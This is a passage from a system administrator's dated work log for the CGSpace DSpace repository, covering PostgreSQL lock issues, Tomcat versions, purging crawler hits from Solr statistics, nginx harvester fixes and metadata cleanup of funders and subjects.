+Jun 08 09:28:29 linode18 tomcat7[6286]:         at org.dspace.rest.HandleResource.getObject(HandleResource.java:81)
+Jun 08 09:28:29 linode18 tomcat7[6286]:         at sun.reflect.GeneratedMethodAccessor360.invoke(Unknown Source)
+Jun 08 09:28:29 linode18 tomcat7[6286]:         at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+Jun 08 09:28:29 linode18 tomcat7[6286]:         at java.lang.reflect.Method.invoke(Method.java:498)
+
    +
  • And:
  • +
+
Jun 06 08:19:54 linode18 tomcat7[6286]: SEVERE: Mapped exception to response: 500 (Internal Server Error)
+Jun 06 08:19:54 linode18 tomcat7[6286]: javax.ws.rs.WebApplicationException
+Jun 06 08:19:54 linode18 tomcat7[6286]:         at org.dspace.rest.Resource.processException(Resource.java:151)
+Jun 06 08:19:54 linode18 tomcat7[6286]:         at org.dspace.rest.CollectionsResource.getCollectionItems(CollectionsResource.java:289)
+Jun 06 08:19:54 linode18 tomcat7[6286]:         at sun.reflect.GeneratedMethodAccessor598.invoke(Unknown Source)
+Jun 06 08:19:54 linode18 tomcat7[6286]:         at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+Jun 06 08:19:54 linode18 tomcat7[6286]:         at java.lang.reflect.Method.invoke(Method.java:498)
+
    +
  • Looking back, I see ~800 of these errors since I changed the database configuration last week:
  • +
+
# journalctl --since=2020-06-04 --until=today -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
+795
+
    +
  • And only ~280 in the entire month before that…
  • +
+
# journalctl --since=2020-05-01 --until=2020-06-04 -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
+286
+
    +
  • So it seems to be related to the database, perhaps because there are fewer connections in the pool? +
      +
    • … and on that note, running without the custom JDBC driver (falling back to DSpace’s built-in connection pool) since 2020-06-04 hasn’t actually solved anything; the issue with locks and “idle in transaction” connections is creeping up again!
    • +
    +
  • +
+

PostgreSQL connections day +PostgreSQL connections week

+
    +
  • It seems to have started today around 10:00 AM… I need to pore over the logs to see if there is a correlation +
      +
    • I think there is some kind of attack going on because I see a bunch of requests for sequential Handles from a similar IP range in a datacenter in Sweden where the user does not re-use their DSpace session_id
    • +
    • Looking in the nginx logs I see most (all?) of these requests are using the following user agent:
    • +
    +
  • +
+
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
+
    +
  • Looking at the nginx access logs I see that, other than something that seems like Google Feedburner, all hosts using this user agent are in Sweden!
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.*.gz | grep 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' | grep -v '/feed' | awk '{print $1}' | sort | uniq -c | sort -n
+   1624 192.36.136.246
+   1627 192.36.241.95
+   1629 192.165.45.204
+   1636 192.36.119.28
+   1641 192.36.217.7
+   1648 192.121.146.160
+   1648 192.36.23.35
+   1651 192.36.109.94
+   1659 192.36.24.93
+   1665 192.36.154.13
+   1679 192.36.137.125
+   1682 192.176.249.42
+   1682 192.36.166.120
+   1683 192.36.172.86
+   1683 192.36.198.145
+   1689 192.36.226.212
+   1702 192.121.136.49
+   1704 192.36.207.54
+   1740 192.36.121.98
+   1774 192.36.173.93
+
    +
  • The earliest I see any of these hosts is 2020-06-05 (three days ago)
  • +
  • I will purge them from the Solr statistics and add them to abusive IPs ipset in the Ansible deployment scripts
  • +
+
$ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
+Purging 1423 hits from 192.36.136.246 in statistics
+Purging 1387 hits from 192.36.241.95 in statistics
+Purging 1398 hits from 192.165.45.204 in statistics
+Purging 1413 hits from 192.36.119.28 in statistics
+Purging 1418 hits from 192.36.217.7 in statistics
+Purging 1418 hits from 192.121.146.160 in statistics
+Purging 1416 hits from 192.36.23.35 in statistics
+Purging 1449 hits from 192.36.109.94 in statistics
+Purging 1440 hits from 192.36.24.93 in statistics
+Purging 1465 hits from 192.36.154.13 in statistics
+Purging 1447 hits from 192.36.137.125 in statistics
+Purging 1453 hits from 192.176.249.42 in statistics
+Purging 1462 hits from 192.36.166.120 in statistics
+Purging 1499 hits from 192.36.172.86 in statistics
+Purging 1457 hits from 192.36.198.145 in statistics
+Purging 1467 hits from 192.36.226.212 in statistics
+Purging 1489 hits from 192.121.136.49 in statistics
+Purging 1478 hits from 192.36.207.54 in statistics
+Purging 1502 hits from 192.36.121.98 in statistics
+Purging 1544 hits from 192.36.173.93 in statistics
+
+Total number of bot hits purged: 29025
+
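  • For reference, a minimal sketch of what such a purge boils down to for a single IP (the real check-spider-ip-hits.sh does more, e.g. counting the hits first; statistics core assumed at localhost:8081 as elsewhere in these notes):
# delete all statistics hits from one IP and soft commit
$ curl -s 'http://localhost:8081/solr/statistics/update?softCommit=true' \
  -H 'Content-Type: text/xml' \
  --data-binary '<delete><query>ip:192.36.136.246</query></delete>'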
    +
  • Skype with Enrico, Moayad, Jane, Peter, and Abenet to see the latest OpenRXV/AReS developments +
      +
    • One thing Enrico mentioned to me during the call was that they had issues with Altmetric’s user agents, and he said they are apparently using Altmetribot and Postgenomic V2
    • +
    • I looked in our logs and indeed we have those, so I will add them to the nginx rate limit bypass
    • +
    • I checked the Solr stats and it seems there are only a few thousand in 2016 and a few hundred in other years so I won’t bother adding it to the DSpace robot user agents list
    • +
    +
  • +
  • Atmire sent an updated pull request for the Font Awesome 5 update for CUA (#445) so I filed feedback on their tracker
  • +
+

2020-06-09

+
    +
  • I’m still thinking about the issue with PostgreSQL “idle in transaction” and “waiting for lock” connections +
      +
    • As far as I can see from the Munin graphs this issue started in late April or early May
    • +
    • I don’t see any PostgreSQL updates around then, though I did update Tomcat to version 7.0.103 in March
    • +
    • I will try to downgrade Tomcat to 7.0.99, which was the version I was using until early February, before we had seen any issues
    • +
    • Also, I will use the PostgreSQL JDBC driver version 42.2.9, which is what we were using back then as well
    • +
    • After deploying Tomcat 7.0.99 I had to restart Tomcat three times before all the Solr statistics cores came up OK
    • +
    +
  • +
  • Well look at that, the “idle in transaction” and locking issues started in April on DSpace Test too…
  • +
+

PostgreSQL connections year DSpace Test

+

2020-06-13

+
    +
  • Atmire sent some questions about DSpace Test related to our ongoing CUA indexing issue +
      +
    • I had to clarify a few build steps and directories on the test server
    • +
    +
  • +
  • I notice that the PostgreSQL connection issues have not come back since 2020-06-09 when I downgraded Tomcat to 7.0.99… fingers crossed that it was something related to that! +
      +
    • On that note I notice that the AReS explorer is still not harvesting CGSpace properly…
    • +
    • I looked at the REST API logs on CGSpace (linode18) and saw that the AReS harvester is being denied due to not having a user agent, oops:
    • +
    +
  • +
+
172.104.229.92 - - [13/Jun/2020:02:00:00 +0200] "GET /rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=0 HTTP/1.1" 403 260 "-" "-"
+
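  • A quick way to see how often that was happening (a sketch; the REST API log file names are assumptions):
# count REST API requests from the AReS host that were denied (HTTP 403) with an empty user agent
$ zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 172.104.229.92 | awk '$9 == 403' | grep -c '"-"$'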
    +
  • I created an nginx map based on the host’s IP address that sets a temporary user agent (ua) and then changed the conditional in the REST API location block so that it checks this mapped ua instead of the default one +
      +
    • That should allow AReS to harvest for now until they update their user agent
    • +
    • I restarted the AReS server’s docker containers with docker-compose down and docker-compose up -d and the next day I saw CGSpace was in AReS again finally
    • +
    +
  • +
+

2020-06-14

+
    +
  • Abenet asked for a list of authors from CIP’s community so that Gabriela can make some corrections +
      +
    • I generated a list of collections in CIP’s two communities using the REST API:
    • +
    +
  • +
+
$ curl -s 'https://cgspace.cgiar.org/rest/handle/10568/51671?expand=collections' 'https://cgspace.cgiar.org/rest/handle/10568/89346?expand=collections' | grep -oE '10568/[0-9]+' | sort | uniq > /tmp/cip-collections.txt
+
    +
  • Then I formatted it into a SQL query and exported a CSV:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value AS author, COUNT(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (SELECT item_id FROM collection2item WHERE collection_id IN (SELECT resource_id FROM handle WHERE handle IN ('10568/100533', '10568/100653', '10568/101955', '10568/106580', '10568/108469', '10568/51671', '10568/53085', '10568/53086', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/53093', '10568/53094', '10568/64874', '10568/69069', '10568/70150', '10568/88229', '10568/89346', '10568/89347', '10568/99301', '10568/99302', '10568/99303', '10568/99304', '10568/99428'))) GROUP BY text_value ORDER BY count DESC) TO /tmp/cip-authors.csv WITH CSV;
+COPY 3917
+
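  • The “formatted it into a SQL query” step is easy to script; one way to build the quoted list for the IN (...) clause from the collection handles (a sketch, not necessarily what I did):
$ sed "s/.*/'&'/" /tmp/cip-collections.txt | paste -sd, -
# gives: '10568/100533','10568/100653',...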

2020-06-15

+
    +
  • Macaroni Bros emailed me to say that they are having issues with thumbnail links on the REST API +
      +
    • For some reason all the bitstream retrieveLink links are wrong because they use /bitstreams/ instead of /rest/bitstreams/, which leads to an HTTP 404
    • +
    • I looked on DSpace Test, which is running DSpace 6 dev branch right now, and the links are OK there!
    • +
    • Looks like someone reported this issue on DSpace 6
    • +
    • Other large DSpace 5 sites have this same issue: https://openknowledge.worldbank.org/handle/10986/30568
    • +
    • I can’t believe nobody ever noticed this before…
    • +
    • I tried to port the patch from DS-3193 to DSpace 5.x and it builds, but causes an HTTP 500 Internal Server error when generating bitstream links
    • +
    • Well, the correct URL should have /rest/ anyway, and that’s how the URLs are in DSpace 6, so I will tell Macaroni Bros to just make sure that those links use /rest/
    • +
    +
  • +
+
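  • For reference, the broken retrieveLink values look something like this on DSpace 5 (hypothetical item and bitstream IDs; jq just pulls out the field):
$ curl -s 'https://cgspace.cgiar.org/rest/items/12345/bitstreams' | jq -r '.[].retrieveLink'
# prints paths like /bitstreams/67890/retrieve instead of /rest/bitstreams/67890/retrieve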

2020-06-16

+
    +
  • Looks like the PostgreSQL connection/lock issue might be fixed because it’s been six days with no recurrence:
  • +
+

PostgreSQL connections week

+
    +
  • And CGSpace is being harvested successfully by AReS every day still
  • +
  • Fix some CIP subjects that had two different styles of dashes, causing them to show up differently in Discovery +
      +
    • SWEETPOTATO AGRI‐FOOD SYSTEMSSWEETPOTATO AGRI-FOOD SYSTEMS
    • +
    • POTATO AGRI‐FOOD SYSTEMSPOTATO AGRI-FOOD SYSTEMS
    • +
    +
  • +
  • They also asked me to update INCLUSIVE VALUE CHAINS to INCLUSIVE GROWTH, both in the existing items on CGSpace and the submission form
  • +
+
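  • The dash fix was the usual fix-metadata-values.py routine; a sketch (the CSV file name is hypothetical, and the actual run may have differed):
$ cat /tmp/2020-06-16-fix-cip-subjects.csv
cg.subject.cip,correct
SWEETPOTATO AGRI‐FOOD SYSTEMS,SWEETPOTATO AGRI-FOOD SYSTEMS
POTATO AGRI‐FOOD SYSTEMS,POTATO AGRI-FOOD SYSTEMS
$ ./fix-metadata-values.py -i /tmp/2020-06-16-fix-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -t correct -m 127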

2020-06-18

+
    +
  • I guess Atmire fixed the CUA download issue after updating the version for Font Awesome 5, but now I get an error during ant update +
      +
    • I tried to remove the config/spring directory, but it still fails
    • +
    • The same issue happens on my local environment and on the DSpace Test server
    • +
    • I raised the issue with Atmire
    • +
    +
  • +
+

2020-06-21

+
    +
  • The PostgreSQL connections and locks still look OK on both CGSpace (linode18) and DSpace Test (linode26) after ten days or so +
      +
    • I decided to upgrade the JDBC driver on DSpace Test from 42.2.9 to 42.2.14 to leave it for a few weeks and see if the issue comes back, as it was present on the test server with DSpace 6 as well
    • +
    • As far as I can tell the issue is related to something in Tomcat > 7.0.99
    • +
    +
  • +
  • Run system updates and reboot DSpace Test
  • +
  • Re-deploy 5_x-prod branch on CGSpace, run system updates, and reboot the server +
      +
    • I had to restart Tomcat 7 once after the server came back up because some of the Solr statistics cores didn’t come up the first time
    • +
    • Unfortunately I realized that I had forgotten to update the 5_x-prod branch to include the REST API fix from last week so I had to rebuild and restart Tomcat again
    • +
    +
  • +
+

2020-06-22

+
    +
  • Skype with Peter, Abenet, Enrico, Jane, and Moayad about the latest OpenRXV developments +
      +
    • I will go visit CodeObia later this week to run through the list of issues and close the ones that are finished
    • +
    +
  • +
+

2020-06-23

+
    +
  • Peter said he’s having problems submitting an item on CGSpace and shit, it seems to be the same fucking PostgreSQL “idle in transaction” and “waiting for lock” issue we’ve been having sporadically the last few months
  • +
+

PostgreSQL connections year CGSpace

+
    +
  • The issue hadn’t occurred in almost two weeks after I downgraded Tomcat to 7.0.99 with the PostgreSQL JDBC driver version 42.2.9 so I thought it was fixed +
      +
    • Apparently it’s not related to the Tomcat or JDBC driver version, as even when I reverted back to DSpace’s really old built-in JDBC driver it still did the same thing!
    • +
    • Could it be a memory leak or something? Why now?
    • +
    • For now I will revert to the latest Tomcat 7.0.104 and PostgreSQL JDBC 42.2.14
    • +
    +
  • +
+

2020-06-24

+
    +
  • Spend some time with Moayad looking over issues for OpenRXV +
      +
    • We updated all the labels, tooltips, and filters
    • +
    • The next step is to go through the GitHub issues and close them if they are done
    • +
    +
  • +
  • I also discussed the dspace-statistics-api with Mohammed Salem +
      +
    • He added some new features to harvest twelve months of item statistics
    • +
    • We talked about extending it to an arbitrary number of months and years, with some sensible defaults
    • +
    • The item and items endpoints could then have ?months=12 and ?years=2 to show stats for the past “x” months or years
    • +
    • We thought other arbitrary date ranges could be added with queries like ?date_from=2020-05 etc that would query Solr on the fly and obviously be slower…
    • +
    +
  • +
+

2020-06-28

+
    +
  • Email GRID.ac to ask them about where old names for institutes are stored, as I see them in the “Disambiguate” search function online, but not in the standalone data +
      +
    • For example, both “International Laboratory for Research on Animal Diseases” (ILRAD) and “International Livestock Centre for Africa” (ILCA) correctly return a hit for “International Livestock Research Institute”, but it’s nowhere in the data
    • +
    +
  • +
  • I discovered two interesting OpenRefine reconciliation services: + +
  • +
+

2020-06-29

+ +
+

Because coverage is so broadly defined, it is preferable to use the more specific subproperties Temporal Coverage and Spatial Coverage.

+
+
    +
  • So I guess we should be using this for countries… but then all regions, countries, etc get merged together into this when you use DCTERMS +
      +
    • Perhaps better to use cg.coverage.country and crosswalk to dcterms.spatial
    • +
    • Another thing is that these values are not literals—you are supposed to embed classes…
    • +
    +
  • +
  • I also notice that there is a CrossRef funders registry with 23,000+ funders that you can download as RDF or access via an API
  • +
+
$ http 'https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&mailto=a.orth@cgiar.org'
+
    +
  • Searching for “Bill and Melinda Gates” we can see the name literal and a list of alt-names literals + +
  • +
  • See the CrossRef API docs (specifically the parameters and filters)
  • +
  • I made a pull request on CG Core v2 to recommend using persistent identifiers for DOIs and ORCID iDs (#26)
  • +
  • I exported sponsors/funders from CGSpace and wrote a script to query the CrossRef API for matches:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29) TO /tmp/2020-06-29-sponsors.csv;
+COPY 682
+
    +
  • The script is crossref-funders-lookup.py and it is based on agrovoc-lookup.py +
      +
    • On that note, I realized I need to URL encode the funder before making the search request with requests because, while the requests library does do URL encoding, it seems to interpret characters like & as query parameter separators, which causes searches for funders like Bill & Melinda Gates Foundation to be misinterpreted (see the curl sketch below)
    • +
    • So then I noticed that I had worked around this in agrovoc-lookup.py a few years ago by just ignoring subjects with special characters like apostrophes and accents!
    • +
    +
  • +
  • I tested the script on our funders:
  • +
+
$ ./crossref-funders-lookup.py -i /tmp/2020-06-29-sponsors.csv -om /tmp/sponsors-matched.txt -or /tmp/sponsors-rejected.txt -d -e blah@blah.com
+$ wc -l /tmp/2020-06-29-sponsors.csv 
+682 /tmp/2020-06-29-sponsors.csv
+$ wc -l /tmp/sponsors-*
+  180 /tmp/sponsors-matched.txt
+  502 /tmp/sponsors-rejected.txt
+  682 total
+
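  • Regarding the & encoding issue above, the equivalent query is easy to test from the shell by letting curl do the encoding (a hypothetical check; jq just shows the hit count):
$ curl -s -G 'https://api.crossref.org/funders' \
  --data-urlencode 'query=Bill & Melinda Gates Foundation' \
  --data-urlencode 'mailto=a.orth@cgiar.org' | jq '.message."total-results"'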
    +
  • It seems that about 26% of our funders (180 of 682) already match… I bet a few more will match if I check for simple errors +
      +
    • Interesting, I found a few funders that we have correct, but can’t figure out how to match them in the API: +
        +
      • Claussen-Simon-Stiftung
      • +
      • H2020 Marie Skłodowska-Curie Actions
      • +
      +
    • +
    +
  • +
+

2020-06-30

+
    +
  • GRID responded to my question about historical names +
      +
    • They said the information is not part of the public GRID or ROR lists, but you can access it with a license to the Dimensions API
    • +
    +
  • +
  • Gabriela from CIP sent me a list of erroneously added CIP subjects to remove from CGSpace:
  • +
+
$ cat /tmp/2020-06-30-remove-cip-subjects.csv 
+cg.subject.cip
+INTEGRATED PEST MANAGEMENT
+ORANGE FLESH SWEET POTATOES
+AEROPONICS
+FOOD SUPPLY
+SASHA
+SPHI
+INSECT LIFE CYCLE MODELLING
+SUSTAIN
+AGRICULTURAL INNOVATIONS
+NATIVE VARIETIES
+PHYTOPHTHORA INFESTANS
+$ ./delete-metadata-values.py -i /tmp/2020-06-30-remove-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -m 127 -d
+
    +
  • She also wants to change their SWEET POTATOES term to SWEETPOTATOES, both in the CIP subject list and existing items so I updated those too:
  • +
+
$ cat /tmp/2020-06-30-fix-cip-subjects.csv 
+cg.subject.cip,correct
+SWEET POTATOES,SWEETPOTATOES
+$ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -t correct -m 127 -d
+
    +
  • She also finished doing all the corrections to authors that I had sent her last week, but many of the changes remove Spanish accents from authors’ names, so I asked if she is sure she really wants to do that
  • +
  • I ran the fixes and deletes on CGSpace, but not on DSpace Test yet because those scripts need updating for DSpace 6 UUIDs
  • +
  • I spent about two hours manually checking our sponsors that were rejected from CrossRef and found about fifty-five corrections that I ran on CGSpace:
  • +
+
$ cat 2020-06-29-fix-sponsors.csv
+dc.description.sponsorship,correct
+"Conselho Nacional de Desenvolvimento Científico e Tecnológico, Brazil","Conselho Nacional de Desenvolvimento Científico e Tecnológico"
+"Claussen Simon Stiftung","Claussen-Simon-Stiftung"
+"Fonds pour la formation á la Recherche dans l'Industrie et dans l'Agriculture, Belgium","Fonds pour la Formation à la Recherche dans l’Industrie et dans l’Agriculture"
+"Fundação de Amparo à Pesquisa do Estado de São Paulo, Brazil","Fundação de Amparo à Pesquisa do Estado de São Paulo"
+"Schlumberger Foundation Faculty for the Future","Schlumberger Foundation"
+"Wildlife Conservation Society, United States","Wildlife Conservation Society"
+"Portuguese Foundation for Science and Technology","Portuguese Science and Technology Foundation"
+"Wageningen University and Research","Wageningen University and Research Centre"
+"Leverhulme Centre for Integrative Research in Agriculture and Health","Leverhulme Centre for Integrative Research on Agriculture and Health"
+"Natural Science and Engineering Research Council of Canada","Natural Sciences and Engineering Research Council of Canada"
+"Biotechnology and Biological Sciences Research Council, United Kingdom","Biotechnology and Biological Sciences Research Council"
+"Home Grown Ceraels Authority United Kingdom","Home-Grown Cereals Authority"
+"Fiat Panis Foundation","Foundation fiat panis"
+"Defence Science and Technology Laboratory, United Kingdom","Defence Science and Technology Laboratory"
+"African Development Bank","African Development Bank Group"
+"Ministry of Health, Labour, and Welfare, Japan","Ministry of Health, Labour and Welfare"
+"World Academy of Sciences","The World Academy of Sciences"
+"Agricultural Research Council, South Africa","Agricultural Research Council"
+"Department of Homeland Security, USA","U.S. Department of Homeland Security"
+"Quadram Institute","Quadram Institute Bioscience"
+"Google.org","Google"
+"Department for Environment, Food and Rural Affairs, United Kingdom","Department for Environment, Food and Rural Affairs, UK Government"
+"National Commission for Science, Technology and Innovation, Kenya","National Commission for Science, Technology and Innovation"
+"Hainan Province Natural Science Foundation of China","Natural Science Foundation of Hainan Province"
+"German Society for International Cooperation (GIZ)","GIZ"
+"German Federal Ministry of Food and Agriculture","Federal Ministry of Food and Agriculture"
+"State Key Laboratory of Environmental Geochemistry, China","State Key Laboratory of Environmental Geochemistry"
+"QUT student scholarship","Queensland University of Technology"
+"Australia Centre for International Agricultural Research","Australian Centre for International Agricultural Research"
+"Belgian Science Policy","Belgian Federal Science Policy Office"
+"U.S. Department of Agriculture USDA","U.S. Department of Agriculture"
+"U.S.. Department of Agriculture (USDA)","U.S. Department of Agriculture"
+"Fundação de Amparo à Pesquisa do Estado de São Paulo ( FAPESP)","Fundação de Amparo à Pesquisa do Estado de São Paulo"
+"Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul, Brazil","Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul"
+"Fundação de Amparo à Pesquisa do Estado do Rio de Janeiro, Brazil","Fundação Carlos Chagas Filho de Amparo à Pesquisa do Estado do Rio de Janeiro"
+"Swedish University of Agricultural Sciences (SLU)","Swedish University of Agricultural Sciences"
+"U.S. Department of Agriculture (USDA)","U.S. Department of Agriculture"
+"Swedish International Development Cooperation Agency (Sida)","Sida"
+"Swedish International Development Agency","Sida"
+"Federal Ministry for Economic Cooperation and Development, Germany","Federal Ministry for Economic Cooperation and Development"
+"Natural Environment Research Council, United Kingdom","Natural Environment Research Council"
+"Economic and Social Research Council, United Kingdom","Economic and Social Research Council"
+"Medical Research Council, United Kingdom","Medical Research Council"
+"Federal Ministry for Education and Research, Germany","Federal Ministry for Education, Science, Research and Technology"
+"UK Government’s Department for International Development","Department for International Development, UK Government"
+"Department for International Development, United Kingdom","Department for International Development, UK Government"
+"United Nations Children's Fund","United Nations Children's Emergency Fund"
+"Swedish Research Council for Environment, Agricultural Science and Spatial Planning","Swedish Research Council for Environment, Agricultural Sciences and Spatial Planning"
+"Agence Nationale de la Recherche, France","French National Research Agency"
+"Fondation pour la recherche sur la biodiversité","Foundation for Research on Biodiversity"
+"Programa Nacional de Innovacion Agraria, Peru","Programa Nacional de Innovación Agraria, Peru"
+"United States Agency for International Development (USAID)","United States Agency for International Development"
+"West Africa Agricultural Productivity Programme","West Africa Agricultural Productivity Program"
+"West African Agricultural Productivity Project","West Africa Agricultural Productivity Program"
+"Rural Development Administration, Republic of Korea","Rural Development Administration"
+"UK’s Biotechnology and Biological Sciences Research Council (BBSRC)","Biotechnology and Biological Sciences Research Council"
+$ ./fix-metadata-values.py -i /tmp/2020-06-29-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
+
    +
  • Then I started a full re-index at batch CPU priority:
  • +
+
$ time chrt --batch 0 dspace index-discovery -b
+
+real    99m16.230s
+user    11m23.245s
+sys     2m56.635s
+
    +
  • Peter wants me to add “CORONAVIRUS DISEASE” to all ILRI items that have ILRI subject “COVID19” +
      +
    • I exported the ILRI community and cut the columns I needed, then opened the file in OpenRefine:
    • +
    +
  • +
+
$ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
+$ dspace metadata-export -i 10568/1 -f /tmp/ilri.csv
+$ csvcut -c 'id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]' /tmp/ilri.csv > /tmp/ilri-covid19.csv
+
    +
  • I see that all items with “COVID19” already have “CORONAVIRUS DISEASE” so I don’t need to do anything
  • +
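  • For the record, one way to double check that from the export (column names as in the csvcut above; the second csvgrep is inverted with -i):
# items tagged COVID19 but missing CORONAVIRUS DISEASE (should be zero rows)
$ csvgrep -c 'cg.subject.ilri[en_US]' -r 'COVID19' /tmp/ilri-covid19.csv \
  | csvgrep -c 'dc.subject[en_US]' -r 'CORONAVIRUS DISEASE' -i \
  | csvstat --count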

July, 2020

+ +
+

2020-07-01

+
    +
  • A few users noticed that CGSpace wasn’t loading items today, item pages seem blank +
      +
    • I looked at the PostgreSQL locks but they don’t seem unusual
    • +
    • I guess this is the same “blank item page” issue that we had a few times in 2019 that we never solved
    • +
    • I restarted Tomcat and PostgreSQL and the issue was gone
    • +
    +
  • +
  • Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter’s request
  • +
+
    +
  • Also, Linode is alerting that we had high outbound traffic rate early this morning around midnight AND high CPU load later in the morning
  • +
  • First looking at the traffic in the morning:
  • +
+
# cat /var/log/nginx/*.log.1 /var/log/nginx/*.log | grep -E "01/Jul/2020:(00|01|02|03|04)" | goaccess --log-format=COMBINED -
+...
+9659 33.56%    1  0.08% 340.94 MiB 64.39.99.13
+3317 11.53%    1  0.08% 871.71 MiB 199.47.87.140
+2986 10.38%    1  0.08%  17.39 MiB 199.47.87.144
+2286  7.94%    1  0.08%  13.04 MiB 199.47.87.142
+
    +
  • 64.39.99.13 belongs to Qualys, but I see they are using a normal desktop user agent:
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15
+
    +
  • I will purge hits from that IP from Solr
  • +
  • The 199.47.87.x IPs belong to Turnitin, and apparently they are NOT marked as bots and we have 40,000 hits from them in 2020 statistics alone:
  • +
+
$ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:/Turnitin.*/&rows=0" | grep -oE 'numFound="[0-9]+"'
+numFound="41694"
+
    +
  • They used to be “TurnitinBot”… hhmmmm, seems they use both: https://turnitin.com/robot/crawlerinfo.html
  • +
  • I will add Turnitin to the DSpace bot user agent list, but I see they are requesting robots.txt and only requesting item pages, so that’s impressive! I don’t need to add them to the “bad bot” rate limit list in nginx
  • +
  • While looking at the logs I noticed eighty-one IPs in the range 185.152.250.x making a small number of requests each with this user agent:
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0
+
    +
  • The IPs all belong to HostRoyale:
  • +
+
# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | wc -l
+81
+# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | sort -h
+185.152.250.1
+185.152.250.101
+185.152.250.103
+185.152.250.105
+185.152.250.107
+185.152.250.111
+185.152.250.115
+185.152.250.119
+185.152.250.121
+185.152.250.123
+185.152.250.125
+185.152.250.129
+185.152.250.13
+185.152.250.131
+185.152.250.133
+185.152.250.135
+185.152.250.137
+185.152.250.141
+185.152.250.145
+185.152.250.149
+185.152.250.153
+185.152.250.155
+185.152.250.157
+185.152.250.159
+185.152.250.161
+185.152.250.163
+185.152.250.165
+185.152.250.167
+185.152.250.17
+185.152.250.171
+185.152.250.183
+185.152.250.189
+185.152.250.191
+185.152.250.197
+185.152.250.201
+185.152.250.205
+185.152.250.209
+185.152.250.21
+185.152.250.213
+185.152.250.217
+185.152.250.219
+185.152.250.221
+185.152.250.223
+185.152.250.225
+185.152.250.227
+185.152.250.229
+185.152.250.231
+185.152.250.233
+185.152.250.235
+185.152.250.239
+185.152.250.243
+185.152.250.247
+185.152.250.249
+185.152.250.25
+185.152.250.251
+185.152.250.253
+185.152.250.255
+185.152.250.27
+185.152.250.29
+185.152.250.3
+185.152.250.31
+185.152.250.39
+185.152.250.41
+185.152.250.47
+185.152.250.5
+185.152.250.59
+185.152.250.63
+185.152.250.65
+185.152.250.67
+185.152.250.7
+185.152.250.71
+185.152.250.73
+185.152.250.77
+185.152.250.81
+185.152.250.85
+185.152.250.89
+185.152.250.9
+185.152.250.93
+185.152.250.95
+185.152.250.97
+185.152.250.99
+
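  • When purging these, the same pipeline can be reused to build the IP list for check-spider-ip-hits.sh (a sketch; one IP per line, with the /tmp/ips file name mirroring the earlier runs of that script):
$ cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort -u > /tmp/ips
$ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p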
    +
  • It’s only a few hundred requests each, but I am very suspicious so I will record it here and purge their IPs from Solr
  • +
  • Then I see 185.187.30.14 and 185.187.30.13 making requests also, with several different “normal” user agents +
      +
    • They are both apparently in France, belonging to Scalair FR hosting
    • +
    • I will purge their requests from Solr too
    • +
    +
  • +
  • Now I see some other new bots I hadn’t noticed before: +
      +
    • Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
    • +
    • Consilio (WebHare Platform 4.28.2-dev); LinkChecker), which appears to be a university CMS
    • +
    • I will add LinkCheck, Consilio, and WebHare to the list of DSpace bot agents and purge them from Solr stats
    • +
    • COUNTER-Robots list already has link.?check but for some reason DSpace didn’t match that and I see hits for some of these…
    • +
    • Maybe I should add [Ll]ink.?[Cc]heck.? to a custom list for now?
    • +
    • For now I added Turnitin to the new bots pull request on COUNTER-Robots
    • +
    +
  • +
  • I purged 20,000 hits from IPs and 45,000 hits from user agents
  • +
  • I will revert the default “example” agents file back to the upstream master branch of COUNTER-Robots, and then add all my custom ones that are pending in pull requests they haven’t merged yet:
  • +
+
$ diff --unchanged-line-format= --old-line-format= --new-line-format='%L' dspace/config/spiders/agents/example ~/src/git/COUNTER-Robots/COUNTER_Robots_list.txt
+Citoid
+ecointernet
+GigablastOpenSource
+Jersey\/\d
+MarcEdit
+OgScrper
+okhttp
+^Pattern\/\d
